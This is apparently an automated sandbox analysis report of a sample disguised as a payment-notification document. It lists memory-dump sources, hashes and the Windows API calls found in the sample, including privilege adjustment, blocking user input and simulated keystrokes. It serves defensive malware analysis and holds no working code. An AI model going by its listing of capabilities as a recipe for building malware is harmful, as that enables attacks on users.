                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                              • String ID:
                                                                              • API String ID: 3429775523-0
                                                                              • Opcode ID: cfa6a3491f0db0fe9bbd8c9e13e6fbcb95dcebd056c5d2fd0133f2a414777a1d
                                                                              • Instruction ID: a17d3918a147d0916cc6b343115465aafb2d79652d5411e0b771a9c2a6b53012
                                                                              • Opcode Fuzzy Hash: cfa6a3491f0db0fe9bbd8c9e13e6fbcb95dcebd056c5d2fd0133f2a414777a1d
                                                                              • Instruction Fuzzy Hash: B8F0F4B2950309FBDF00DFE49C89EAEBBBCFB08604F504565E501E2181E774AA849BA0
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(009128E9,?,00904CBE,009128E9,009A88B8,0000000C,00904E15,009128E9,00000002,00000000,?,009128E9), ref: 00904D09
                                                                              • TerminateProcess.KERNEL32(00000000,?,00904CBE,009128E9,009A88B8,0000000C,00904E15,009128E9,00000002,00000000,?,009128E9), ref: 00904D10
                                                                              • ExitProcess.KERNEL32 ref: 00904D22
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentExitTerminate
                                                                              • String ID:
                                                                              • API String ID: 1703294689-0
                                                                              • Opcode ID: 1e3a4b946854b8c4d32bdf3f1721564b4a9f6319003cf4110870d40b7ddc789c
                                                                              • Instruction ID: 0242f1fb78880037b9bf2c34a71b59d3646aa2489035ef3c32a521b98c184651
                                                                              • Opcode Fuzzy Hash: 1e3a4b946854b8c4d32bdf3f1721564b4a9f6319003cf4110870d40b7ddc789c
                                                                              • Instruction Fuzzy Hash: D3E0B6B2114248BFCF11AF54DD0AA583B6DEB81B85B108018FD099A1B2CB35ED82DB80
                                                                              APIs
                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 0093D28C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: NameUser
                                                                              • String ID: X64
                                                                              • API String ID: 2645101109-893830106
                                                                              • Opcode ID: ebad1094f7d09e45d64c5ce57b65cd50feb97421859f648805ed7a383b3c6b48
                                                                              • Instruction ID: 79cc3311d5f3a09fac9056f64bb0d45baca58a8e577c2e027caabdae969518d9
                                                                              • Opcode Fuzzy Hash: ebad1094f7d09e45d64c5ce57b65cd50feb97421859f648805ed7a383b3c6b48
                                                                              • Instruction Fuzzy Hash: CFD0C9B581511DEADF90CBA0EC88DDAB37CBB04305F100555F606E2000DB3495489F10
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                              • Instruction ID: b29bbdd2880a89e796e68f97d0dea015bfe5a1e7f15416a296dd096aa3fcbf3f
                                                                              • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                              • Instruction Fuzzy Hash: F5021DB1E001299FDF14CFA9C8806ADBBF5EF88314F25466AE919E7384D731AD418B94
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00956918
                                                                              • FindClose.KERNEL32(00000000), ref: 00956961
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: cb2029e588515ad76c9c304a2d4980f06d981b781f05fbb86c511bfb99120eee
                                                                              • Instruction ID: 658f2487575da50b5330faaba0e445999e7c20eb9550d4ad5e945a204c442296
                                                                              • Opcode Fuzzy Hash: cb2029e588515ad76c9c304a2d4980f06d981b781f05fbb86c511bfb99120eee
                                                                              • Instruction Fuzzy Hash: 0611D0716042009FC710CF2AD484A16BBE4FF85329F44C69DE8698F2A2CB30EC45CB91
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00964891,?,?,00000035,?), ref: 009537E4
                                                                              • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00964891,?,?,00000035,?), ref: 009537F4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFormatLastMessage
                                                                              • String ID:
                                                                              • API String ID: 3479602957-0
                                                                              • Opcode ID: e1271025082eb70e8e4b33b1d21495f07747dfbe545f1f3d28bef7b5675daa86
                                                                              • Instruction ID: a791772a4ead227f22f1b96c3f8e4bbc35dd422787047cbf4afe1126a925a0a9
                                                                              • Opcode Fuzzy Hash: e1271025082eb70e8e4b33b1d21495f07747dfbe545f1f3d28bef7b5675daa86
                                                                              • Instruction Fuzzy Hash: DBF0ECB16042252AE71057765C4DFDB379DEFC5761F000165F509D2281D9609944D7B0
                                                                              APIs
                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0094B25D
                                                                              • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0094B270
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: InputSendkeybd_event
                                                                              • String ID:
                                                                              • API String ID: 3536248340-0
                                                                              • Opcode ID: 5ec22f9b2d2942f1e14ccd81bd7e6a8b6b296165a35725d59bf6a0ba73809ff8
                                                                              • Instruction ID: 23ebc24e5e4ba15f68f65c15f944624fbec23e323beced1771bab034de0aaf9e
                                                                              • Opcode Fuzzy Hash: 5ec22f9b2d2942f1e14ccd81bd7e6a8b6b296165a35725d59bf6a0ba73809ff8
                                                                              • Instruction Fuzzy Hash: 56F01D7181424EABDB059FA0C805BAE7BB4FF14305F008409F965A5191D779D6519F94
                                                                              APIs
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009411FC), ref: 009410D4
                                                                              • CloseHandle.KERNEL32(?,?,009411FC), ref: 009410E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                              • String ID:
                                                                              • API String ID: 81990902-0
                                                                              • Opcode ID: a42c544102f997cf4ce39b0e915b6bc2dcf01bebc9ba8b5db679ccd368397494
                                                                              • Instruction ID: e2e9efc095dfae83b282a4a6a5ae04a75bdd7cbee67ab7338c5a2c0491929ecf
                                                                              • Opcode Fuzzy Hash: a42c544102f997cf4ce39b0e915b6bc2dcf01bebc9ba8b5db679ccd368397494
                                                                              • Instruction Fuzzy Hash: 32E0BF72018610EEF7252B65FC05E7777A9FF04310B14882DF6A5D44B1DB626CD0EB50
                                                                              Strings
                                                                              • Variable is not of type 'Object'., xrefs: 00930C40
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Variable is not of type 'Object'.
                                                                              • API String ID: 0-1840281001
                                                                              • Opcode ID: a6a8b37357e7cb906477487a633f0fb0519d201e8974972c739f47da64ee86c3
                                                                              • Instruction ID: 32025803e6dc25c8dd664b9d3f41975fe865c1ea75f4209b5098b9a0edb42ae1
                                                                              • Opcode Fuzzy Hash: a6a8b37357e7cb906477487a633f0fb0519d201e8974972c739f47da64ee86c3
                                                                              • Instruction Fuzzy Hash: 91328B30E002589FCF14DF95C891AEDB7B9FF46308F208059E816AB292DB75AD46CB61
                                                                              APIs
                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00916766,?,?,00000008,?,?,0091FEFE,00000000), ref: 00916998
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise
                                                                              • String ID:
                                                                              • API String ID: 3997070919-0
                                                                              • Opcode ID: ff73efc54317736920aa50a831c8d88d0505f14173cb8ca294f5089ecba0080c
                                                                              • Instruction ID: 39976bf149d9aafd7e17483b39f5305a3773629727e216d00c98f2f64ce14b77
                                                                              • Opcode Fuzzy Hash: ff73efc54317736920aa50a831c8d88d0505f14173cb8ca294f5089ecba0080c
                                                                              • Instruction Fuzzy Hash: 99B13C31A10609DFD715CF28C486BA57BE0FF45364F298698E8E9CF2A2C335E991CB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID: 0-3916222277
                                                                              • Opcode ID: b6ce1fa55431c7f974e29be8c89fbfd38ba88c11a60ddde8d140d22a0f5de794
                                                                              • Instruction ID: e85d3a4d3bb8b0ff5298ec5e5ff6941be1becf46239c9f85521ff08985aa5f66
                                                                              • Opcode Fuzzy Hash: b6ce1fa55431c7f974e29be8c89fbfd38ba88c11a60ddde8d140d22a0f5de794
                                                                              • Instruction Fuzzy Hash: D6124E759002299BCB14CF68C9806FEB7F5FF58710F14819AE949EB255EB349E81CF90
                                                                              APIs
                                                                              • BlockInput.USER32(00000001), ref: 0095EABD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: BlockInput
                                                                              • String ID:
                                                                              • API String ID: 3456056419-0
                                                                              • Opcode ID: 1795c22639850fa7c3cbeb74a66d989148a24b74bebf5bb53abdb682debee398
                                                                              • Instruction ID: e64c4a21e3dc0559610bb282085a38e2d5d7fac59684c1db928526116d76223b
                                                                              • Opcode Fuzzy Hash: 1795c22639850fa7c3cbeb74a66d989148a24b74bebf5bb53abdb682debee398
                                                                              • Instruction Fuzzy Hash: 07E09A362002009FC300EF6AD804E8AB7EDFF98760F00841AFC0AC7250CAB0E8408B91
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,009003EE), ref: 009009DA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 72f98d1bbf433826fa9901366d31a052632791720617ebfb83111e509d032e45
                                                                              • Instruction ID: eddb1e0fe77ae660060d07e3f7ede5bf9765c752a4aad2e075b151050108bd06
                                                                              • Opcode Fuzzy Hash: 72f98d1bbf433826fa9901366d31a052632791720617ebfb83111e509d032e45
                                                                              • Instruction Fuzzy Hash:
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0
                                                                              • API String ID: 0-4108050209
                                                                              • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                              • Instruction ID: 268a52e204e22bf25c1772cea7cdd31a75a5abcca8ced21d63e1340a063aa13d
                                                                              • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                              • Instruction Fuzzy Hash: 98513661F0C6456FDB3885E888997BFE39D9B42370F188909DC86D72C2C615FE41D362
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4f526c3d5bfcf7337b5148fb58ce7c8778efe8f452e67a0af027e9b0288b98cf
                                                                              • Instruction ID: d290b9d7e4eac3ea43c22ce68aff5427cca76e826eba9e32849b4f9af87258e3
                                                                              • Opcode Fuzzy Hash: 4f526c3d5bfcf7337b5148fb58ce7c8778efe8f452e67a0af027e9b0288b98cf
                                                                              • Instruction Fuzzy Hash: 8D320231E2DF064DD7239634D822325A699AFB73C5F15D727F81AB5AA6EB28C4C35200
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: edeac304f097e91971fe257b9f7611fad90f96f9eba89a70c2a1aa35320f0b2b
                                                                              • Instruction ID: 153d6aa585db021329b087c8705fc98958da203db25fad787c143cea8b711f1b
                                                                              • Opcode Fuzzy Hash: edeac304f097e91971fe257b9f7611fad90f96f9eba89a70c2a1aa35320f0b2b
                                                                              • Instruction Fuzzy Hash: CB3248B2A0455D8BCF28CF38C59067DB7A5FF45304F28852AE99AEB291D234DE81DF41
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cfeb4a8760be078b3b5129cdfd0de59497bdd4a28647079e9ed2b6097f2fa461
                                                                              • Instruction ID: acc0d0542b4d4a0c0818e64e594941c12c6bd810616169084ddb1951a3c9678a
                                                                              • Opcode Fuzzy Hash: cfeb4a8760be078b3b5129cdfd0de59497bdd4a28647079e9ed2b6097f2fa461
                                                                              • Instruction Fuzzy Hash: A5221470A0461ADFDF14DF69D881AAEB3F5FF45300F204629E816EB2A5EB35AD10CB51
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5a8cda57face5692fd735bb49400c03acb1d2e1c8841f665521f048f17c72853
                                                                              • Instruction ID: da1e94c02bd83c6903b54297d74fd0b4506b56341a870d4ee6c16c8f716e9bd2
                                                                              • Opcode Fuzzy Hash: 5a8cda57face5692fd735bb49400c03acb1d2e1c8841f665521f048f17c72853
                                                                              • Instruction Fuzzy Hash: DC02D5B0E00219EFCF04DF65D881AAEB7B5FF45300F108169E956DB295EB71AE10CB81
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 26ff141945011966e0475464416673a8b795c7803e8511d1f0c99ae558b10903
                                                                              • Instruction ID: 717ebe99630f704fa0a01d5e50003719279c674590f0bc9da64c592c82e4ff49
                                                                              • Opcode Fuzzy Hash: 26ff141945011966e0475464416673a8b795c7803e8511d1f0c99ae558b10903
                                                                              • Instruction Fuzzy Hash: 1BB1D130E3AF414DD62396398831336B65CAFBB6D5F91D71BFC2674E62EB2285835240
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
